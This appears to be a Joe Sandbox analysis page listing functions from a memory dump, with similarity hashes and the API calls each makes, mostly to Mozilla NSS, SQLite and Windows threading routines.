Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: 1ae7d95a485086e13f0766089e38c8c4a66638cf121abc21c0e943dbee9ff24d
Instruction ID: 79f2f60c14b31d86cc8ba39e292642c5679691d3fe20dc1eaef080bd6fcd48dd
Opcode Fuzzy Hash: 1ae7d95a485086e13f0766089e38c8c4a66638cf121abc21c0e943dbee9ff24d
Instruction Fuzzy Hash: 60F0E211E4892C6BE73080259E1BF8737864BC2339F0949A1FA0A77F92D629D8604292

Uniqueness

Uniqueness Score: -1.00%

Function 6C820C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(00000000,00000000,6C821444,?,00000001,?,00000000,00000000,?,?,6C821444,?,?,00000000,?,?), ref: 6C820CB3

Part of subcall function 6C88C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C88C2BF

PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C821444,?,00000001,?,00000000,00000000,?,?,6C821444,?), ref: 6C820DC1
PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6C821444,?,00000001,?,00000000,00000000,?,?,6C821444,?), ref: 6C820DEC

Part of subcall function 6C840F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C7E2AF5,?,?,?,?,?,6C7E0A1B,00000000), ref: 6C840F1A
Part of subcall function 6C840F10: malloc.MOZGLUE(00000001), ref: 6C840F30
Part of subcall function 6C840F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C840F42

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6C821444,?,00000001,?,00000000,00000000,?), ref: 6C820DFF
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6C821444,?,00000001,?,00000000), ref: 6C820E16
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C821444,?,00000001,?,00000000,00000000,?), ref: 6C820E53
PR_GetCurrentThread.NSS3(?,?,?,?,6C821444,?,00000001,?,00000000,00000000,?,?,6C821444,?,?,00000000), ref: 6C820E65
PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C821444,?,00000001,?,00000000,00000000,?), ref: 6C820E79

Part of subcall function 6C831560: TlsGetValue.KERNEL32(00000000,?,6C800844,?), ref: 6C83157A
Part of subcall function 6C831560: EnterCriticalSection.KERNEL32(?,?,?,6C800844,?), ref: 6C83158F
Part of subcall function 6C831560: PR_Unlock.NSS3(?,?,?,?,6C800844,?), ref: 6C8315B2

Part of subcall function 6C7FB1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6C801397,00000000,?,6C7FCF93,5B5F5EC0,00000000,?,6C801397,?), ref: 6C7FB1CB
Part of subcall function 6C7FB1A0: free.MOZGLUE(5B5F5EC0,?,6C7FCF93,5B5F5EC0,00000000,?,6C801397,?), ref: 6C7FB1D2

Part of subcall function 6C7F89E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C7F88AE,-00000008), ref: 6C7F8A04
Part of subcall function 6C7F89E0: EnterCriticalSection.KERNEL32(?), ref: 6C7F8A15
Part of subcall function 6C7F89E0: memset.VCRUNTIME140(6C7F88AE,00000000,00000132), ref: 6C7F8A27
Part of subcall function 6C7F89E0: PR_Unlock.NSS3(?), ref: 6C7F8A35

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
String ID:
API String ID: 1601681851-0
Opcode ID: 1638fd75a2c2571eaefa6fd544ca0cd5407963937c8a0d0da0d24137cbd9304d
Instruction ID: 925ab483916cf11c1a3a44df59e795d4d7acd5d2cd0f197085ac469a854ca07b
Opcode Fuzzy Hash: 1638fd75a2c2571eaefa6fd544ca0cd5407963937c8a0d0da0d24137cbd9304d
Instruction Fuzzy Hash: 24511AF5E012045FEB209F68DE89AAB37A89F0521CF150934EC0997712F735ED5987E2

Uniqueness

Uniqueness Score: -1.00%

Function 6C7D6E50 Relevance: 12.2, APIs: 8, Instructions: 189COMMON

Download Yara Rule

APIs

sqlite3_value_text.NSS3(?,?), ref: 6C7D6ED8
sqlite3_value_text.NSS3(?,?), ref: 6C7D6EE5
memcmp.VCRUNTIME140(00000000,?,?,?,?), ref: 6C7D6FA8
sqlite3_value_text.NSS3(00000000,?), ref: 6C7D6FDB
sqlite3_result_error_nomem.NSS3(?,?,?,?,?), ref: 6C7D6FF0
sqlite3_value_blob.NSS3(?,?), ref: 6C7D7010
sqlite3_value_blob.NSS3(?,?), ref: 6C7D701D
sqlite3_value_text.NSS3(00000000,?,?,?), ref: 6C7D7052

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: sqlite3_value_text$sqlite3_value_blob$memcmpsqlite3_result_error_nomem
String ID:
API String ID: 1920323672-0
Opcode ID: 2d76de4d2d2bbf7116a343087b41e0b6852d408f3533477541995c143d9eddad
Instruction ID: 07d968e725efddd81a5c516a53f035088b6e3c7afb4a786793adf092c424f02f
Opcode Fuzzy Hash: 2d76de4d2d2bbf7116a343087b41e0b6852d408f3533477541995c143d9eddad
Instruction Fuzzy Hash: C36108B1E146068FDB00CFA8CA447EEB7B2AF85308F2A4575D414AB795E732BD05CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6C848F80 Relevance: 12.2, APIs: 8, Instructions: 158memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,?,FFFFE005,?,6C847313), ref: 6C848FBB

Part of subcall function 6C8407B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C7E8298,?,?,?,6C7DFCE5,?), ref: 6C8407BF
Part of subcall function 6C8407B0: PL_HashTableLookup.NSS3(?,?), ref: 6C8407E6
Part of subcall function 6C8407B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C84081B
Part of subcall function 6C8407B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C840825

SECOID_FindOID_Util.NSS3(?,?,?,FFFFE005,?,6C847313), ref: 6C849012
SECOID_FindOID_Util.NSS3(?,?,?,?,FFFFE005,?,6C847313), ref: 6C84903C
SECITEM_CompareItem_Util.NSS3(?,?,?,?,?,?,FFFFE005,?,6C847313), ref: 6C84909E
PORT_ArenaGrow_Util.NSS3(?,?,?,00000001,?,?,?,?,?,?,FFFFE005,?,6C847313), ref: 6C8490DB
PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,FFFFE005,?,6C847313), ref: 6C8490F1

Part of subcall function 6C8410C0: TlsGetValue.KERNEL32(?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C8410F3
Part of subcall function 6C8410C0: EnterCriticalSection.KERNEL32(?,?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C84110C
Part of subcall function 6C8410C0: PL_ArenaAllocate.NSS3(?,?,?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C841141
Part of subcall function 6C8410C0: PR_Unlock.NSS3(?,?,?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C841182
Part of subcall function 6C8410C0: TlsGetValue.KERNEL32(?,6C7E8802,00000000,00000008,?,6C7DEF74,00000000), ref: 6C84119C

PR_SetError.NSS3(FFFFE005,00000000,?,?,?,FFFFE005,?,6C847313), ref: 6C84906B

Part of subcall function 6C88C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C88C2BF

PR_SetError.NSS3(FFFFE005,00000000,?,FFFFE005,?,6C847313), ref: 6C849128

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Util$Error$ArenaFindValue$HashLookupTable$Alloc_AllocateCompareConstCriticalEnterGrow_Item_SectionUnlock
String ID:
API String ID: 3590961175-0
Opcode ID: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
Instruction ID: 9ac43ade6cd0402ead119b9e9b52a46cc5ee16094e9fb2b2a8a22eb3283f46d8
Opcode Fuzzy Hash: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
Instruction Fuzzy Hash: 3951B271A002098FEB30DF6ADF44B26B3F9AF54319F158869D919D7B61E735E800CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6C84C6E0 Relevance: 12.1, APIs: 8, Instructions: 149COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,?,?,?,?,?,6C8471CF,?), ref: 6C84C70F

Part of subcall function 6C8407B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C7E8298,?,?,?,6C7DFCE5,?), ref: 6C8407BF
Part of subcall function 6C8407B0: PL_HashTableLookup.NSS3(?,?), ref: 6C8407E6
Part of subcall function 6C8407B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C84081B
Part of subcall function 6C8407B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C840825

CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6C8471CF,?), ref: 6C84C7B1

Part of subcall function 6C7E95B0: TlsGetValue.KERNEL32(00000000,?,6C8000D2,00000000), ref: 6C7E95D2
Part of subcall function 6C7E95B0: EnterCriticalSection.KERNEL32(?,?,?,6C8000D2,00000000), ref: 6C7E95E7
Part of subcall function 6C7E95B0: PR_Unlock.NSS3(?,?,?,?,6C8000D2,00000000), ref: 6C7E9605

PORT_FreeArena_Util.NSS3(?,00000000,?,?,?,?,?,6C8471CF,?), ref: 6C84C7D5
CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6C8471CF,?), ref: 6C84C811
CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6C8471CF,?), ref: 6C84C841
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C84C855
PORT_FreeArena_Util.NSS3(?,00000000,?,?,?,?,?,6C8471CF,?), ref: 6C84C868

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Util$Arena_CertificateDestroyFree$ErrorHashLookupTable$ConstCriticalEnterFindSectionUnlockValue
String ID:
API String ID: 1768726504-0
Opcode ID: fc537cff35ca18c10af1df844d24871b5193ba69ef4e89025439c59b561f8c00
Instruction ID: 77c4d5e37d55290854c1d891afb29fc0cb5edca3d772d54d9d5137ba40dfcebc
Opcode Fuzzy Hash: fc537cff35ca18c10af1df844d24871b5193ba69ef4e89025439c59b561f8c00
Instruction Fuzzy Hash: 6941A372A012298BE720EE19DE80B5677ADAF06758B198834DC18DBB13F720F808C690

Uniqueness

Uniqueness Score: -1.00%

Function 6C832470 Relevance: 12.1, APIs: 8, Instructions: 141COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6C832D7C,6C809192,?), ref: 6C83248E
EnterCriticalSection.KERNEL32(02B80138), ref: 6C8324A2
memset.VCRUNTIME140(6C832D7C,00000020,6C832D5C), ref: 6C83250E
memset.VCRUNTIME140(6C832D9C,00000020,6C832D7C), ref: 6C832535
memset.VCRUNTIME140(?,00000020,?), ref: 6C83255C
memset.VCRUNTIME140(?,00000020,?), ref: 6C832583
PR_Unlock.NSS3(?), ref: 6C832594
PR_SetError.NSS3(00000000,00000000), ref: 6C8325AF

Part of subcall function 6C88C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C88C2BF

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: memset$Value$CriticalEnterErrorSectionUnlock
String ID:
API String ID: 2972906980-0
Opcode ID: 41f461759758ba4b03b8bdb85f8da4479f1601f1f37d2805cd2523bbf61f11a7
Instruction ID: c533c85d800bd1f622e8c6e021e0bee6de86d0fe14622ed31c1a24250aec1f2c
Opcode Fuzzy Hash: 41f461759758ba4b03b8bdb85f8da4479f1601f1f37d2805cd2523bbf61f11a7
Instruction Fuzzy Hash: 6741F4B1E002115BEB219FB4DE987AA3774BB59308F143E68DC09DB652F774E684C2E0

Uniqueness

Uniqueness Score: -1.00%

Function 6C8305A0 Relevance: 12.1, APIs: 8, Instructions: 127memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000000), ref: 6C8305DA

Part of subcall function 6C840BE0: malloc.MOZGLUE(6C838D2D,?,00000000,?), ref: 6C840BF8
Part of subcall function 6C840BE0: TlsGetValue.KERNEL32(6C838D2D,?,00000000,?), ref: 6C840C15

TlsGetValue.KERNEL32(00000000), ref: 6C83060C
EnterCriticalSection.KERNEL32 ref: 6C830629
TlsGetValue.KERNEL32(00000000), ref: 6C83066F
EnterCriticalSection.KERNEL32 ref: 6C83068C
PR_Unlock.NSS3 ref: 6C8306AA
PK11_GetNextSafe.NSS3 ref: 6C8306C3
PR_Unlock.NSS3 ref: 6C8306F9

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$Alloc_K11_NextSafeUtilmalloc
String ID:
API String ID: 1593870348-0
Opcode ID: 3b42d20495a7a295a365f6ccba2573ba2f816562d94fc4ad1d04601072377219
Instruction ID: 1d52fef7de4af32d1b195115c143b5055f6cc27c33dbff71362652fc3ed27aec
Opcode Fuzzy Hash: 3b42d20495a7a295a365f6ccba2573ba2f816562d94fc4ad1d04601072377219
Instruction Fuzzy Hash: 2A513FB4A057568FDB20DFB8C68456ABBF0BF45304F10A929D85D9B705EB70D884CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6C83A470 Relevance: 12.1, APIs: 8, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C83A4A6

Part of subcall function 6C840840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C8408B4

PORT_Alloc_Util.NSS3(?), ref: 6C83A4EC

Part of subcall function 6C840BE0: malloc.MOZGLUE(6C838D2D,?,00000000,?), ref: 6C840BF8
Part of subcall function 6C840BE0: TlsGetValue.KERNEL32(6C838D2D,?,00000000,?), ref: 6C840C15

memcpy.VCRUNTIME140(-00000006,?,?), ref: 6C83A527
memcmp.VCRUNTIME140(00000006,?,?), ref: 6C83A56D
memcmp.VCRUNTIME140(00000006,00000006,00000004), ref: 6C83A583
PR_SetError.NSS3(FFFFE00A,00000000), ref: 6C83A596
free.MOZGLUE(?), ref: 6C83A5A4
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C83A5B6

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Error$Utilmemcmp$Alloc_FindTag_Valuefreemallocmemcpy
String ID:
API String ID: 3906949479-0
Opcode ID: dd2fc7b603f1f56e897f6883b3e69a699ff182edcdf6a0cb9097863ae7529197
Instruction ID: 16514822fe40ade34b87975b5aef08e6fa6b2bae86d908bbc0f93b9980eb4ad9
Opcode Fuzzy Hash: dd2fc7b603f1f56e897f6883b3e69a699ff182edcdf6a0cb9097863ae7529197
Instruction Fuzzy Hash: 2141E531A042559FDF21CFD9CD40BDABB61AF50208F149868D86D9BB42E731E919C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 6C8FA6F0 Relevance: 12.1, APIs: 8, Instructions: 117threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C8A9890: TlsGetValue.KERNEL32(?,?,?,6C8A97EB), ref: 6C8A989E

EnterCriticalSection.KERNEL32(?), ref: 6C8FA712
_PR_MD_UNLOCK.NSS3(?), ref: 6C8FA76D

Part of subcall function 6C8A70F0: LeaveCriticalSection.KERNEL32(6C8F0C7B), ref: 6C8A710D

calloc.MOZGLUE(00000001,0000000C), ref: 6C8FA779
_PR_CreateThread.NSS3(00000000,6C8F9EA0,?,00000001,00000001,00000000,?,00000000), ref: 6C8FA79B
free.MOZGLUE(00000000), ref: 6C8FA7AB
EnterCriticalSection.KERNEL32(?), ref: 6C8FA7C5
_PR_MD_NOTIFY_CV.NSS3(?), ref: 6C8FA7FC
_PR_MD_UNLOCK.NSS3(?), ref: 6C8FA824

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: CriticalSection$Enter$CreateLeaveThreadValuecallocfree
String ID:
API String ID: 3459369588-0
Opcode ID: fef8ba5410735560ae4366273cebbfa3278aa6998c900985f07518e17cc78d76
Instruction ID: f2a712b022c7a9bae57dacca159e72fb20782f81b6a249d0608f4f4f6b81e802
Opcode Fuzzy Hash: fef8ba5410735560ae4366273cebbfa3278aa6998c900985f07518e17cc78d76
Instruction Fuzzy Hash: FE41A1B5900B059FC720CF69C980967B7F8FF45358B148A29D859C7B11E771F846CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6C8266B0 Relevance: 12.1, APIs: 8, Instructions: 109stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000010,00000000), ref: 6C8266D0
realloc.MOZGLUE(?,?,?,?,?,00000010,00000000), ref: 6C8266FB

Part of subcall function 6C844540: PORT_ZAlloc_Util.NSS3(00000001,?,-00000001,-00000001,?,6C826725,?,00000022,?,?,?,?,?,00000010,00000000), ref: 6C844581

memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00000010,00000000), ref: 6C82673A
memcpy.VCRUNTIME140(00000001,00000000,-00000001,?,?,?,?,?,?,?,?,?,?,00000010,00000000), ref: 6C826757
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000010,00000000), ref: 6C82676E
memcpy.VCRUNTIME140(6C81C79F,?,?,?,?,?,00000010,00000000), ref: 6C826781
memcpy.VCRUNTIME140(00000001,?,-00000001,?,?,?,?,?,?,00000010,00000000), ref: 6C82679D
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,00000010,00000000), ref: 6C8267BC

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: memcpy$Alloc_ErrorUtilfreereallocstrlen
String ID:
API String ID: 922128022-0
Opcode ID: 3b14e3555ad9d9a8916c62bb6844d7cd417e02fb519ff4f055505deaecbb6830
Instruction ID: 057d52805a153fec9c94247984d2ff18675f265fd08499cfe83e4254c169e858
Opcode Fuzzy Hash: 3b14e3555ad9d9a8916c62bb6844d7cd417e02fb519ff4f055505deaecbb6830
Instruction Fuzzy Hash: 2631C572900319AFDB21CF98ED459AB77B8EF86354B040938EC54DB340E732A919C7E2

Uniqueness

Uniqueness Score: -1.00%

Function 6C804E50 Relevance: 12.1, APIs: 8, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C804E90
EnterCriticalSection.KERNEL32 ref: 6C804EA9
TlsGetValue.KERNEL32 ref: 6C804EC6
EnterCriticalSection.KERNEL32 ref: 6C804EDF
PL_HashTableLookup.NSS3 ref: 6C804EF8
PR_Unlock.NSS3 ref: 6C804F05
PR_Now.NSS3 ref: 6C804F13
PR_Unlock.NSS3 ref: 6C804F3A

Part of subcall function 6C7D07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C76204A), ref: 6C7D07AD
Part of subcall function 6C7D07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C76204A), ref: 6C7D07CD
Part of subcall function 6C7D07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C76204A), ref: 6C7D07D6
Part of subcall function 6C7D07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C76204A), ref: 6C7D07E4
Part of subcall function 6C7D07A0: TlsSetValue.KERNEL32(00000000,?,6C76204A), ref: 6C7D0864
Part of subcall function 6C7D07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C7D0880
Part of subcall function 6C7D07A0: TlsSetValue.KERNEL32(00000000,?,?,6C76204A), ref: 6C7D08CB
Part of subcall function 6C7D07A0: TlsGetValue.KERNEL32(?,?,6C76204A), ref: 6C7D08D7
Part of subcall function 6C7D07A0: TlsGetValue.KERNEL32(?,?,6C76204A), ref: 6C7D08FB

Memory Dump Source

Source File: 00000000.00000002.3276973927.000000006C761000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000000.00000002.3276958633.000000006C760000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277093860.000000006C8FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277126526.000000006C93E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277142398.000000006C93F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277157721.000000006C940000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3277175524.000000006C945000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c760000_c4RAHq3BNl.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
String ID:
API String ID: 326028414-0
Opcode ID: 12f99ffff6e7bf518e9f262e8195f6deb7a908cc70458d336806f307e55956ef
Instruction ID: 71d613df5daa4543d9dd707b28105c6dfde7cfe7680e2186e05f24e071c4c214
Opcode Fuzzy Hash: 12f99ffff6e7bf518e9f262e8195f6deb7a908cc70458d336806f307e55956ef
Instruction Fuzzy Hash: FC413DB4A046059FCB10EF78C58486ABBF0FF89354F118A69DC599B711EB30E895CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6C8425E0 Relevance: 12.1, APIs: 8, Instructions: 76memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 6C842610
PORT_Alloc_Util.NSS3(00000000,?,000000FF,00000000,00000000), ref: 6C84261F

Part of subcall function 6C840BE0: malloc.MOZGLUE(6C838D2D,?,00000000,?), ref: 6C840BF8
Part of subcall function 6C840BE0: TlsGetValue.KERNEL32(6C838D2D,?,00000000,?), ref: 6C840C15

